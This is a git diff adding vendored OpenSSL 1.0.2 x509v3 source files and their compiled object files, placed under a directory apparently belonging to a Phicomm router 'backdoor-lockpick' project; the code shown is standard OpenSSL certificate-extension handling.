z;Fk%$Lh#E4UoZ6c3cgA3Zo&UU@S6nxrQmWNUlCl+`yT}F7kaYup#TZ}PzfI%*G$19
zf?p!IlrKgHLqa_P_^_S|ab9i^+!7q0!L$5I!SS~(^E1T0E%nb9T<X76aH-!fxYWOw
z)*ad}^$ZIx_1q`8)H5P@K-mAR;8OqVf=m6!1(*8yMuYBW+Md<V+V#*cCyO%pa}lSA
z-#4h&IKTg}SMbv*kB9pN$0=Hl3L!n~98|wEFi-rr;3&U|co7}(fczFJdj)5kQANGr
z${s2^&ySt%P|pvE@73hDQ+Zf$v~z^Y_`DVq9#GG{RDMZt^c%lt!oQ<gp5^#`E9OV2
zy_ePn^EZj}dnn95B3_}%=TNy)<I|~Jukl$_Ua9eNDtBnyPi1_biiz!Ez1uZ@9hG-!
zyr0UqX`FxO4{My|?$h|aRNk-gN2vUy#(zcSXEpvRmGg2^;|e=j^=%1`qWpeNy~g?d
zAAYY3{Uh}}smZgRXEn}xipU1`v-94BVR!|{-({RCDZ}#o9tE!v<S`b8V}~Zs?^pB*
zF6H+Mj`7d$QQRi@M#|%1zu+j(?_-PzF7>}IILh~+!H`CsgNipPukQ~@|4=(Tr1?j1
z)c+yr<@Y$STH4>C$)6;7xu3{)b8ge*_fvUTa4A0`INI|Bm7f%RGxdoFFXb@?DP$FC
z)A(IfzFp(IFFl}fe*ca4Vb)(no#c`|%u9&R(>R|OR%)E%nf<_e_`SH7G<kmi0pC->
z#Pa+;0}q}#zqfEY*~OgSujBoR`BXZu<NGC2KfhP7S>tm^ez(T?y#n5^SU<1pcQko^
z?hh{srS-dy&flkNoS*NPX#4?^=lg-&FF)VseTn(=B;Tg#;ph09HU1&V@76e958(R~
zm{>nQuQy5~Te_nyYvCB}ca9yL!@qEqM#Gz<MyYygQ@S=1F-rS;v4G;fQg{NZgcN}s
zRF-!2wzhOl<VI<0Z+CYX{&rT{(;E$!!b|QKs|S=+Ue^;Vg@1&>AG4xcsCBplp2*;X
zp|2o$K?jB=-401=tfX8mUH5VYg)tY6nUKS4vdScJGTyn)aeJY2EPw;H&2x$dpARl1
zPSZfOhOtxYmn-!C=RpPP{Ic!wHyr9LhmTC$KfcE#6Zg+YKU88~?|(ZE7}BU#;Z-#C
zRSDTl{u{=JU6Agj_NWf$NcZ0jz%urK8dN}fmJM}^hL?_fSP7X-{ag4j2~r`AAN$9?
z_5Sgi8@nijk4*JvI3)^$WEGpkNBoV&`J@nJwo-e^Ft5wTf#H^>O_Q;m+Iyi+Cbpm1
z4<Lg&_4dQmz6hNolHUHiP?yPnD@~`-u<+lhfVe%!f2O{%<^Hpr_Pgl!D=wpj@X_1j
j_NIlHYFIg29Spv2?35<@Z@NqSkE@*)cXLBJ>i++4Jv5IX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_enum.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_enum.c
new file mode 100644
index 0000000..7678664
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_enum.c
@@ -0,0 +1,100 @@
+/* v3_enum.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509v3.h>
+
+static ENUMERATED_NAMES crl_reasons[] = {
+    {CRL_REASON_UNSPECIFIED, "Unspecified", "unspecified"},
+    {CRL_REASON_KEY_COMPROMISE, "Key Compromise", "keyCompromise"},
+    {CRL_REASON_CA_COMPROMISE, "CA Compromise", "CACompromise"},
+    {CRL_REASON_AFFILIATION_CHANGED, "Affiliation Changed",
+     "affiliationChanged"},
+    {CRL_REASON_SUPERSEDED, "Superseded", "superseded"},
+    {CRL_REASON_CESSATION_OF_OPERATION,
+     "Cessation Of Operation", "cessationOfOperation"},
+    {CRL_REASON_CERTIFICATE_HOLD, "Certificate Hold", "certificateHold"},
+    {CRL_REASON_REMOVE_FROM_CRL, "Remove From CRL", "removeFromCRL"},
+    {CRL_REASON_PRIVILEGE_WITHDRAWN, "Privilege Withdrawn",
+     "privilegeWithdrawn"},
+    {CRL_REASON_AA_COMPROMISE, "AA Compromise", "AACompromise"},
+    {-1, NULL, NULL}
+};
+
+const X509V3_EXT_METHOD v3_crl_reason = {
+    NID_crl_reason, 0, ASN1_ITEM_ref(ASN1_ENUMERATED),
+    0, 0, 0, 0,
+    (X509V3_EXT_I2S)i2s_ASN1_ENUMERATED_TABLE,
+    0,
+    0, 0, 0, 0,
+    crl_reasons
+};
+
+char *i2s_ASN1_ENUMERATED_TABLE(X509V3_EXT_METHOD *method, ASN1_ENUMERATED *e)
+{
+    ENUMERATED_NAMES *enam;
+    long strval;
+    strval = ASN1_ENUMERATED_get(e);
+    for (enam = method->usr_data; enam->lname; enam++) {
+        if (strval == enam->bitnum)
+            return BUF_strdup(enam->lname);
+    }
+    return i2s_ASN1_ENUMERATED(method, e);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_enum.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_enum.o
new file mode 100644
index 0000000000000000000000000000000000000000..b16f2f13f450aa5ee55b6b4e1162e77b98d4ca9e
GIT binary patch
literal 3624
zcmcJRO>7%Q6vxMLp(YKkQ$R#2f<07F1X<ZBU+DqaaqX;%i6bXgkq~k=_Sjz4_FB8^
zG|2%fB2c3UsZuYMxKxM(M~>xI5C_DGBjQ4j;X^`*0~G?5_jccS$CKSl5hJbN`~UX6
zHy=B@<M&FH@>C+hL`$&OS*QeM?6XHgKkvJFc8bliKTbaVSKZkE$JqbV*!wkO?0aWY
zhj`yOsBahtpp1jvl<~oRZ_a2=8;f6#rj5O?Gw=N5$LxJI_sfr{js4#O<d>FyK9c<Z
z)2$EOA#Yl3i?`TF^55V)TG8$g9lLM2oL%NSk}4MDd&PoutI%#+J<Iegd!QA&=AZ+0
z&5#MSHX3rr<t@1DhHjC&Zjf4SYgLHw1#1diZHKVP9S?@xG(D~vcCQ6dW8mu=@7r5k
zE5i)5Vy(g)U!z2|>R4M=k9W9s$@01_$GkFNL%~8+n3!onp6P=<m8d<2m8N3KC1d!p
z82(TUe>jGxVz{*JCnBaNR4DF43zg(87mMe$v-Qo<z#D0c`Z+y2pL=!W%iOyQSv~vG
z^8pTWa9$a>a30GmbzGM_$izB44nDTTZjB|jGl|nP$5Yo~QO^K-%D=<dD%w&y^WoIR
zwAP(YXA0?5>BPl!=0ZAdy8gR=jQt)thh*fJ0mmdpMIDn#vgoIi^k+30dje#Fg~Lio
z8zjk&PX>?chw*Yil3}%@Ey-q%LLf=@XbeC4l%IsiQ_?#4YYZ$07d|hwEdz++Z^!U<
z4BrJlE3I1>G`4GSMb&3p=Nf!4>g!F`bb1Yko31@@nYG|H3TrF5Mroz~W~o+KFI{M?
z7nUj|)>y7omkO0ewOn2+tp~8d)YuO9*iyaRa6P9r8b+1Fj>8_06tFyh*zAeG_&ekz
z_<!Sz18q^_I4{8~5}%d0*a5g*9-|mES@My~Pj^G&A{UYHF<#znVr>N%J4nMMXoAlL
zlAR?h_;aLRQ~1lI^9nDLURAizZz;S*x~uRjq=yQBpY&CQi*xpx!apT_Q{i8bzNPSQ
zNq?^JA4uO;_|K%jQTRR5-zj_s7Z%!G|2JI!XNVsve4e;Q9M6}DGe&oJ`kuMTblB2?
z?F!G~JyZAiw#W3A>6uL5bX}(V6g7IfV*{~$328Y!rv~)wrrBe9)9&~A04fb^kL&P7
zpLad8d6{%)Fw)^K2AuTX4i(_tM%yv_oW}iMjRpm9Db({X4-A{wUx5l@g^%_$T=+H5
z!zH(EDrgYIcNzOhk)9*_EOGUuxK8&~Lyv8YUjz?pK4|_ckc&0d{9C}Vbptd0)y7`n
z;P*Xh{&yngk7u?ze|)d8{{^_@CeFF@%7ld!_7Wtaua19%HnXTBYHPwFTLT+4{uF)e
z?ovni{BZ2*_&dNbBny|^x-_5{WC*?(x3EKr$)PvY3DHfFCt|OHgF~HocR}Bzd<}fL
ziSY}D-!H7G=HI6Lya*(#=HCDwwSI>bDE2w7AD%ZNU+}2Dv8#L3zgYiFOg{b(jasVj
b>5uNmSWIf_`r(-wmCxu8?k7?%x@!Kv{KQ&j

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_extku.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_extku.c
new file mode 100644
index 0000000..6092c2e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_extku.c
@@ -0,0 +1,149 @@
+/* v3_extku.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static void *v2i_EXTENDED_KEY_USAGE(const X509V3_EXT_METHOD *method,
+                                    X509V3_CTX *ctx,
+                                    STACK_OF(CONF_VALUE) *nval);
+static STACK_OF(CONF_VALUE) *i2v_EXTENDED_KEY_USAGE(const X509V3_EXT_METHOD
+                                                    *method, void *eku, STACK_OF(CONF_VALUE)
+                                                    *extlist);
+
+const X509V3_EXT_METHOD v3_ext_ku = {
+    NID_ext_key_usage, 0,
+    ASN1_ITEM_ref(EXTENDED_KEY_USAGE),
+    0, 0, 0, 0,
+    0, 0,
+    i2v_EXTENDED_KEY_USAGE,
+    v2i_EXTENDED_KEY_USAGE,
+    0, 0,
+    NULL
+};
+
+/* NB OCSP acceptable responses also is a SEQUENCE OF OBJECT */
+const X509V3_EXT_METHOD v3_ocsp_accresp = {
+    NID_id_pkix_OCSP_acceptableResponses, 0,
+    ASN1_ITEM_ref(EXTENDED_KEY_USAGE),
+    0, 0, 0, 0,
+    0, 0,
+    i2v_EXTENDED_KEY_USAGE,
+    v2i_EXTENDED_KEY_USAGE,
+    0, 0,
+    NULL
+};
+
+ASN1_ITEM_TEMPLATE(EXTENDED_KEY_USAGE) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, EXTENDED_KEY_USAGE, ASN1_OBJECT)
+ASN1_ITEM_TEMPLATE_END(EXTENDED_KEY_USAGE)
+
+IMPLEMENT_ASN1_FUNCTIONS(EXTENDED_KEY_USAGE)
+
+static STACK_OF(CONF_VALUE) *i2v_EXTENDED_KEY_USAGE(const X509V3_EXT_METHOD
+                                                    *method, void *a, STACK_OF(CONF_VALUE)
+                                                    *ext_list)
+{
+    EXTENDED_KEY_USAGE *eku = a;
+    int i;
+    ASN1_OBJECT *obj;
+    char obj_tmp[80];
+    for (i = 0; i < sk_ASN1_OBJECT_num(eku); i++) {
+        obj = sk_ASN1_OBJECT_value(eku, i);
+        i2t_ASN1_OBJECT(obj_tmp, 80, obj);
+        X509V3_add_value(NULL, obj_tmp, &ext_list);
+    }
+    return ext_list;
+}
+
+static void *v2i_EXTENDED_KEY_USAGE(const X509V3_EXT_METHOD *method,
+                                    X509V3_CTX *ctx,
+                                    STACK_OF(CONF_VALUE) *nval)
+{
+    EXTENDED_KEY_USAGE *extku;
+    char *extval;
+    ASN1_OBJECT *objtmp;
+    CONF_VALUE *val;
+    int i;
+
+    if (!(extku = sk_ASN1_OBJECT_new_null())) {
+        X509V3err(X509V3_F_V2I_EXTENDED_KEY_USAGE, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        val = sk_CONF_VALUE_value(nval, i);
+        if (val->value)
+            extval = val->value;
+        else
+            extval = val->name;
+        if (!(objtmp = OBJ_txt2obj(extval, 0))) {
+            sk_ASN1_OBJECT_pop_free(extku, ASN1_OBJECT_free);
+            X509V3err(X509V3_F_V2I_EXTENDED_KEY_USAGE,
+                      X509V3_R_INVALID_OBJECT_IDENTIFIER);
+            X509V3_conf_err(val);
+            return NULL;
+        }
+        sk_ASN1_OBJECT_push(extku, objtmp);
+    }
+    return extku;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_extku.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_extku.o
new file mode 100644
index 0000000000000000000000000000000000000000..ab2ab8e2a34bf743b772bc4947638134b1320773
GIT binary patch
literal 5064
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
ZbryJ8T3pG6Z(jHO*Vy=vK)Wb%{=cO|wp#!I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_genn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_genn.c
new file mode 100644
index 0000000..7f40bfa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_genn.c
@@ -0,0 +1,250 @@
+/* v3_genn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+ASN1_SEQUENCE(OTHERNAME) = {
+        ASN1_SIMPLE(OTHERNAME, type_id, ASN1_OBJECT),
+        /* Maybe have a true ANY DEFINED BY later */
+        ASN1_EXP(OTHERNAME, value, ASN1_ANY, 0)
+} ASN1_SEQUENCE_END(OTHERNAME)
+
+IMPLEMENT_ASN1_FUNCTIONS(OTHERNAME)
+
+ASN1_SEQUENCE(EDIPARTYNAME) = {
+        ASN1_IMP_OPT(EDIPARTYNAME, nameAssigner, DIRECTORYSTRING, 0),
+        ASN1_IMP_OPT(EDIPARTYNAME, partyName, DIRECTORYSTRING, 1)
+} ASN1_SEQUENCE_END(EDIPARTYNAME)
+
+IMPLEMENT_ASN1_FUNCTIONS(EDIPARTYNAME)
+
+ASN1_CHOICE(GENERAL_NAME) = {
+        ASN1_IMP(GENERAL_NAME, d.otherName, OTHERNAME, GEN_OTHERNAME),
+        ASN1_IMP(GENERAL_NAME, d.rfc822Name, ASN1_IA5STRING, GEN_EMAIL),
+        ASN1_IMP(GENERAL_NAME, d.dNSName, ASN1_IA5STRING, GEN_DNS),
+        /* Don't decode this */
+        ASN1_IMP(GENERAL_NAME, d.x400Address, ASN1_SEQUENCE, GEN_X400),
+        /* X509_NAME is a CHOICE type so use EXPLICIT */
+        ASN1_EXP(GENERAL_NAME, d.directoryName, X509_NAME, GEN_DIRNAME),
+        ASN1_IMP(GENERAL_NAME, d.ediPartyName, EDIPARTYNAME, GEN_EDIPARTY),
+        ASN1_IMP(GENERAL_NAME, d.uniformResourceIdentifier, ASN1_IA5STRING, GEN_URI),
+        ASN1_IMP(GENERAL_NAME, d.iPAddress, ASN1_OCTET_STRING, GEN_IPADD),
+        ASN1_IMP(GENERAL_NAME, d.registeredID, ASN1_OBJECT, GEN_RID)
+} ASN1_CHOICE_END(GENERAL_NAME)
+
+IMPLEMENT_ASN1_FUNCTIONS(GENERAL_NAME)
+
+ASN1_ITEM_TEMPLATE(GENERAL_NAMES) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, GeneralNames, GENERAL_NAME)
+ASN1_ITEM_TEMPLATE_END(GENERAL_NAMES)
+
+IMPLEMENT_ASN1_FUNCTIONS(GENERAL_NAMES)
+
+GENERAL_NAME *GENERAL_NAME_dup(GENERAL_NAME *a)
+{
+    return (GENERAL_NAME *)ASN1_dup((i2d_of_void *)i2d_GENERAL_NAME,
+                                    (d2i_of_void *)d2i_GENERAL_NAME,
+                                    (char *)a);
+}
+
+/* Returns 0 if they are equal, != 0 otherwise. */
+int GENERAL_NAME_cmp(GENERAL_NAME *a, GENERAL_NAME *b)
+{
+    int result = -1;
+
+    if (!a || !b || a->type != b->type)
+        return -1;
+    switch (a->type) {
+    case GEN_X400:
+    case GEN_EDIPARTY:
+        result = ASN1_TYPE_cmp(a->d.other, b->d.other);
+        break;
+
+    case GEN_OTHERNAME:
+        result = OTHERNAME_cmp(a->d.otherName, b->d.otherName);
+        break;
+
+    case GEN_EMAIL:
+    case GEN_DNS:
+    case GEN_URI:
+        result = ASN1_STRING_cmp(a->d.ia5, b->d.ia5);
+        break;
+
+    case GEN_DIRNAME:
+        result = X509_NAME_cmp(a->d.dirn, b->d.dirn);
+        break;
+
+    case GEN_IPADD:
+        result = ASN1_OCTET_STRING_cmp(a->d.ip, b->d.ip);
+        break;
+
+    case GEN_RID:
+        result = OBJ_cmp(a->d.rid, b->d.rid);
+        break;
+    }
+    return result;
+}
+
+/* Returns 0 if they are equal, != 0 otherwise. */
+int OTHERNAME_cmp(OTHERNAME *a, OTHERNAME *b)
+{
+    int result = -1;
+
+    if (!a || !b)
+        return -1;
+    /* Check their type first. */
+    if ((result = OBJ_cmp(a->type_id, b->type_id)) != 0)
+        return result;
+    /* Check the value. */
+    result = ASN1_TYPE_cmp(a->value, b->value);
+    return result;
+}
+
+void GENERAL_NAME_set0_value(GENERAL_NAME *a, int type, void *value)
+{
+    switch (type) {
+    case GEN_X400:
+    case GEN_EDIPARTY:
+        a->d.other = value;
+        break;
+
+    case GEN_OTHERNAME:
+        a->d.otherName = value;
+        break;
+
+    case GEN_EMAIL:
+    case GEN_DNS:
+    case GEN_URI:
+        a->d.ia5 = value;
+        break;
+
+    case GEN_DIRNAME:
+        a->d.dirn = value;
+        break;
+
+    case GEN_IPADD:
+        a->d.ip = value;
+        break;
+
+    case GEN_RID:
+        a->d.rid = value;
+        break;
+    }
+    a->type = type;
+}
+
+void *GENERAL_NAME_get0_value(GENERAL_NAME *a, int *ptype)
+{
+    if (ptype)
+        *ptype = a->type;
+    switch (a->type) {
